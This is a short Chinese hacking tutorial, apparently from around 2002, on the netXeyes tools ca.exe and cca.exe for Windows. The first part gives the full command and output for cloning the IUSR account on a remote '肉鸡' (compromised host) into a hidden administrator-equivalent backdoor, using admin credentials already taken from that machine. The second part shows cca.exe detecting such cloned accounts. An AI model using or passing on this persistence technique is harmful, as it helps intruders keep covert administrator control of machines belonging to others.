利用SA.exe 将Iusr_victim克隆为Administrator。

C:\>ca \\192.168.0.1 test test iusr_victim password
Clone Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, dansnow@21cn.com

Connect 192.168.0.1 ....OK
Get SID of iusr_victim ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK

这时，iusr_victim就成为了超级用户，并有具有和Administrator同样的设置(桌面、菜单等等）。

注：在ca \\192.168.0.1 test test iusr_victim password 中，
192.168.0.1是肉鸡的IP地址；第一个test是你已经得到的肉鸡上的管理员用户名，第二个test是这个用户名的密码；iusr_victim是你想克隆的帐号，最后这个password就是你想给iusr_victim用的密码。
-------------------------------------------------------

用CCA.EXE检查是否存在克隆的帐号。
不必改变ACL, 支持远程检查。
C:\>cca \\192.168.0.29 administrator 123456
Check Clone Account, by netXeyes 2002/04/29
Written by netXeyes 2002, dansnow@21cn.com

Connect 192.168.0.29 ....OK
Prepairing ....OK
Processing ....OK
Checking ....

Check Result:

[DuDu] AS SAME AS [administrator]
[Guest] AS SAME AS [administrator]
[IUSR_RONG] AS SAME AS [administrator]
[IWAM_RONG] AS SAME AS [administrator]
[TEST] AS SAME AS [administrator]
[xr] AS SAME AS [administrator]
[Guest] AS SAME AS [DuDu]
[IUSR_RONG] AS SAME AS [DuDu]
这上面的DuDu，guest，IUSR_RONG等帐户就已经是被克隆为administrator啦
注意删除克隆账户是小心一定注意。我试验过很多机子删除之后administrator账户不再超管组